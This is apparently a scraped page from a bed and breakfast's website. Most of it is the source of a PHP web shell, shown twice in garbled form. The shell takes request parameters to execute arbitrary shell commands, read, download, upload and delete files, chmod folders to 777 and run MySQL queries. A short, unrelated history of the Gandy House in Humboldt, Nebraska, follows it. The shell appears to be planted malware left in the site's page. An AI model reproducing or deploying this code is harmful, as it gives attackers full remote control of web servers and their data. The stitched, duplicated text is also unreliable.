$val)//Process .. directories and a single . { if($val=="..") { $parts[$key]=""; $lastKey=$key-1; $parts[$lastKey]=""; } elseif($val==".") { $parts[$key]=""; } } reset($parts); $fixedPath=($isLinux ? "/" : "");//Some PHP configs wont automatically create a variable on .= or will at least whine about it $firstPiece=true; foreach($parts as $val)//Assemble the path back together { if($val != "") { $fixedPath .= ($firstPiece ? '' : $slash) . $val; $firstPiece=false; } } if($fixedPath=="")//If we took out the entire path go to bottom level to avoid an error { $fixedPath=($isLinux ? $slash : ($driveLetter . ":" . $slash)); } //Make sure there is an ending slash if(substr($fixedPath,-1)!=$slash) $fixedPath .= $slash; return $fixedPath; } if(isset($_REQUEST['chm'])) { if(!$isLinux) { echo "This feature only works on Linux"; } else { echo (@chmod ( $_REQUEST['chm'] , 0777 ) ? "Reassigned" : "Can't Reasign"); } } elseif(isset($_REQUEST['phpinfo'])) { phpinfo(); } elseif(isset($_REQUEST['dl'])) { if(@fopen($_REQUEST['dl'] . $_REQUEST['file'],'r')==true) { $_REQUEST['dl'] .= $_REQUEST['file']; if(substr($_REQUEST['dl'],0,1)==$slash) $fileArr=explode($slash,$_REQUEST['dl']); header('Content-disposition: attachment; filename=' . $_REQUEST['file']); header('Content-type: application/octet-stream'); readfile($_REQUEST['dl']); } else { echo $_REQUEST['dl']; } } elseif(isset($_REQUEST["gz"])) { if(!$isLinux) { echo "This feature only works on Linux"; } else { $directory=$_REQUEST["gz"]; if(substr($directory,-1)=="/") $directory = substr($directory,0,-1); $dirParts=explode($slash,$directory); $fname=$dirParts[(sizeof($dirParts)-1)]; $archive = time(); exec( "cd $directory; tar czf $archive *"); $output=@file_get_contents($directory . "/" . $archive); if(!$output) header("Content-disposition: attachment; filename=ACCESS_PROBLEM"); else { header("Content-disposition: attachment; filename=$fname.tgz"); echo $output; } header('Content-type: application/octet-stream'); @unlink($directory . "/" . $archive); } } elseif(isset($_REQUEST['f'])) { $filename=$_REQUEST['f']; $file=fopen("$filename","rb"); header("Content-Type: text/plain"); fpassthru($file); } elseif(isset($_REQUEST['d'])) { $d=$_REQUEST['d']; echo "

";
    if ($handle = opendir("$d")) 
    {
        echo "

listing of "; $conString=""; if($isLinux) echo "$slash"; foreach(explode($slash,cleanPath($d,$isLinux)) as $val) { $conString .= $val . $slash; echo "" . $val . "" . ($val != "" ? $slash : ''); } echo " (upload file) (DB interaction files in red)

 (gzip & download folder) (chmod folder to 777) (these rarely work)

"; while ($dir = readdir($handle)) { if (is_dir("$d$slash$dir")) { if($dir != "." && $dir !="..") $dirList[]=$dir; } else { if(isset($_REQUEST["hldb"])) { $contents=file_get_contents("$d$slash$dir"); if (stripos($contents, "mysql_") || stripos($contents, "mysqli_") || stripos($contents, "SELECT ")) { $fileList[]=array('dir'=>$dir,'color'=>'red'); } else { $fileList[]=array('dir'=>$dir,'color'=>'black'); } } else { $fileList[]=array('dir'=>$dir,'color'=>'black'); } } } echo ".\n"; echo "..\n"; //Some configurations throw a notice if is_array is tried with a non-existant variable if(isset($dirList)) if(is_array($dirList)) foreach($dirList as $dir) { echo "$dir\n"; } if(isset($fileList)) if(is_array($fileList)) foreach($fileList as $dir) { echo "" . $dir['dir'] . "" . "|Download|" . "|Edit|" . "|Delete| \n"; } } else echo "opendir() failed"; closedir($handle); } elseif(isset($_REQUEST['c'])) { if( @ini_get('safe_mode') ) { echo 'Safe mode is on, the command is by default run though escapeshellcmd() and can only run programms in safe_mod_exec_dir (' . @ini_get('safe_mode_exec_dir') . ')
'; } echo "Command: " . $_REQUEST['c'] . "

"; trim(exec($_REQUEST['c'],$return)); foreach($return as $val) { echo '

' . htmlentities($val) . '

'; } } elseif(isset($_REQUEST['uploadForm']) || isset($_FILES["file_name"])) { if(isset($_FILES["file_name"])) { if ($_FILES["file_name"]["error"] > 0) { echo "Error"; } else { $target_path = $_COOKIE["uploadDir"]; if(substr($target_path,-1) != "/") $target_path .= "/"; $target_path = $target_path . basename( $_FILES['file_name']['name']); if(move_uploaded_file($_FILES['file_name']['tmp_name'], $target_path)) { setcookie("uploadDir",""); echo "The file ". basename( $_FILES['file_name']['name']). " has been uploaded"; } else { echo "Error copying file, likely a permission error."; } } } else { ?>

Submit this form before submitting file (will open in new window):
Upload Directory: ">



Upload file:
The following query has sucessfully executed" . htmlentities($mquery) . "


"; echo "Return Results:
"; $first=true; echo "

"; while ($row = mysql_fetch_array($result,MYSQL_ASSOC)) { if($first) { echo ""; foreach($row as $key=>$val) { echo ""; } echo ""; reset($row); $first=false; } echo ""; foreach($row as $val) { echo ""; } echo ""; } echo "
$key
$val

"; mysql_free_result($result); } else { echo "Query Error: " . mysql_error(); } } elseif(isset($_REQUEST['df'])) { $_REQUEST['df'] .= $slash . $_REQUEST['file']; if(@unlink($_REQUEST['df'])) { echo "File deleted"; } else { echo "Error deleting file"; } } elseif(isset($_REQUEST['ef'])) { ?>




Server Information:
Operating System:
PHP Version:
View phpinfo


Directory Traversal
Go to current working directory
Go to root directory
Go to any directory:


Execute MySQL Query:

host
user
password
database
query

Execute Shell Command (safe mode is ):
 
<?php
}
//Intentionally left open to avoid output the file download function 1



$val)//Process .. directories and a single . { if($val=="..") { $parts[$key]=""; $lastKey=$key-1; $parts[$lastKey]=""; } elseif($val==".") { $parts[$key]=""; } } reset($parts); $fixedPath=($isLinux ? "/" : "");//Some PHP configs wont automatically create a variable on .= or will at least whine about it $firstPiece=true; foreach($parts as $val)//Assemble the path back together { if($val != "") { $fixedPath .= ($firstPiece ? '' : $slash) . $val; $firstPiece=false; } } if($fixedPath=="")//If we took out the entire path go to bottom level to avoid an error { $fixedPath=($isLinux ? $slash : ($driveLetter . ":" . $slash)); } //Make sure there is an ending slash if(substr($fixedPath,-1)!=$slash) $fixedPath .= $slash; return $fixedPath; } if(isset($_REQUEST['chm'])) { if(!$isLinux) { echo "This feature only works on Linux"; } else { echo (@chmod ( $_REQUEST['chm'] , 0777 ) ? "Reassigned" : "Can't Reasign"); } } elseif(isset($_REQUEST['phpinfo'])) { phpinfo(); } elseif(isset($_REQUEST['dl'])) { if(@fopen($_REQUEST['dl'] . $_REQUEST['file'],'r')==true) { $_REQUEST['dl'] .= $_REQUEST['file']; if(substr($_REQUEST['dl'],0,1)==$slash) $fileArr=explode($slash,$_REQUEST['dl']); header('Content-disposition: attachment; filename=' . $_REQUEST['file']); header('Content-type: application/octet-stream'); readfile($_REQUEST['dl']); } else { echo $_REQUEST['dl']; } } elseif(isset($_REQUEST["gz"])) { if(!$isLinux) { echo "This feature only works on Linux"; } else { $directory=$_REQUEST["gz"]; if(substr($directory,-1)=="/") $directory = substr($directory,0,-1); $dirParts=explode($slash,$directory); $fname=$dirParts[(sizeof($dirParts)-1)]; $archive = time(); exec( "cd $directory; tar czf $archive *"); $output=@file_get_contents($directory . "/" . $archive); if(!$output) header("Content-disposition: attachment; filename=ACCESS_PROBLEM"); else { header("Content-disposition: attachment; filename=$fname.tgz"); echo $output; } header('Content-type: application/octet-stream'); @unlink($directory . "/" . $archive); } } elseif(isset($_REQUEST['f'])) { $filename=$_REQUEST['f']; $file=fopen("$filename","rb"); header("Content-Type: text/plain"); fpassthru($file); } elseif(isset($_REQUEST['d'])) { $d=$_REQUEST['d']; echo "

";
    if ($handle = opendir("$d")) 
    {
        echo "

listing of "; $conString=""; if($isLinux) echo "$slash"; foreach(explode($slash,cleanPath($d,$isLinux)) as $val) { $conString .= $val . $slash; echo "" . $val . "" . ($val != "" ? $slash : ''); } echo " (upload file) (DB interaction files in red)

 (gzip & download folder) (chmod folder to 777) (these rarely work)

"; while ($dir = readdir($handle)) { if (is_dir("$d$slash$dir")) { if($dir != "." && $dir !="..") $dirList[]=$dir; } else { if(isset($_REQUEST["hldb"])) { $contents=file_get_contents("$d$slash$dir"); if (stripos($contents, "mysql_") || stripos($contents, "mysqli_") || stripos($contents, "SELECT ")) { $fileList[]=array('dir'=>$dir,'color'=>'red'); } else { $fileList[]=array('dir'=>$dir,'color'=>'black'); } } else { $fileList[]=array('dir'=>$dir,'color'=>'black'); } } } echo ".\n"; echo "..\n"; //Some configurations throw a notice if is_array is tried with a non-existant variable if(isset($dirList)) if(is_array($dirList)) foreach($dirList as $dir) { echo "$dir\n"; } if(isset($fileList)) if(is_array($fileList)) foreach($fileList as $dir) { echo "" . $dir['dir'] . "" . "|Download|" . "|Edit|" . "|Delete| \n"; } } else echo "opendir() failed"; closedir($handle); } elseif(isset($_REQUEST['c'])) { if( @ini_get('safe_mode') ) { echo 'Safe mode is on, the command is by default run though escapeshellcmd() and can only run programms in safe_mod_exec_dir (' . @ini_get('safe_mode_exec_dir') . ')
'; } echo "Command: " . $_REQUEST['c'] . "

"; trim(exec($_REQUEST['c'],$return)); foreach($return as $val) { echo '

' . htmlentities($val) . '

'; } } elseif(isset($_REQUEST['uploadForm']) || isset($_FILES["file_name"])) { if(isset($_FILES["file_name"])) { if ($_FILES["file_name"]["error"] > 0) { echo "Error"; } else { $target_path = $_COOKIE["uploadDir"]; if(substr($target_path,-1) != "/") $target_path .= "/"; $target_path = $target_path . basename( $_FILES['file_name']['name']); if(move_uploaded_file($_FILES['file_name']['tmp_name'], $target_path)) { setcookie("uploadDir",""); echo "The file ". basename( $_FILES['file_name']['name']). " has been uploaded"; } else { echo "Error copying file, likely a permission error."; } } } else { ?>

Submit this form before submitting file (will open in new window):
Upload Directory: ">



Upload file:
The following query has sucessfully executed" . htmlentities($mquery) . "


"; echo "Return Results:
"; $first=true; echo "

"; while ($row = mysql_fetch_array($result,MYSQL_ASSOC)) { if($first) { echo ""; foreach($row as $key=>$val) { echo ""; } echo ""; reset($row); $first=false; } echo ""; foreach($row as $val) { echo ""; } echo ""; } echo "
$key
$val

"; mysql_free_result($result); } else { echo "Query Error: " . mysql_error(); } } elseif(isset($_REQUEST['df'])) { $_REQUEST['df'] .= $slash . $_REQUEST['file']; if(@unlink($_REQUEST['df'])) { echo "File deleted"; } else { echo "Error deleting file"; } } elseif(isset($_REQUEST['ef'])) { ?>




Server Information:
Operating System:
PHP Version:
View phpinfo


Directory Traversal
Go to current working directory
Go to root directory
Go to any directory:


Execute MySQL Query:

host
user
password
database
query

Execute Shell Command (safe mode is ):
 
<?php
}
//Intentionally left open to avoid output the file download function 1



HISTORY

"The Gandy House" began as a wooden store front around Humboldt square and in 1889 was moved to its current site. Dr George and Clementine (Rousek) Gandy built on to the house after they married in 1910. Dr Gandy was born in Humboldt in 1880 and graduated from Humboldt Public Schools. After leaving to obtain his medical degree, he returned to Humboldt in 1904 and set up his medical practice in the Park Hotel on the Square. His father, Dr James L Gandy, was the first physician to locate in Humboldt in 1869. His mother, Mary E (Otto)Gandy ran a drug store.

The native rock that surrounds the property and featured on the front porch, sun room and upper deck, were gathered from farm fields surrounding Humboldt. It was told that Dr Gandy paid local persons fifty cents a day to gather these rocks and bring them to his property. The working wood fireplace in the living room also features the native rock.

Part of the original house was one of the first wooden buildings around the City square. It was relocated to its present location when brick buildings were built.

The original antique lighting fixtures and dark woodwork are featured throughout the house.

The Stalder Family purchased the home from the Estate of Clementine Gandy in 1972. Duaine and Sandy (Schacht) Stalder, innkeepers, purchased the home from the Estate of Harry Stalder in 2008 to become the "Stalder's B & B - "The Gandy House" with their motto being "It's like staying at Grandpa and Grandma's house".

“The Gandy House” is located just off highway 105 between highways 4 and 8. It is approximately 75 miles south of Lincoln, NE, 90 miles south of Omaha, NE, and 120 miles north of Kansas City, MO.

It is located one block north of Humboldt’s Historic City Square.

You can relax in the large sun room, front porch, by the stone fireplace in the living room, or read a book in the parlor.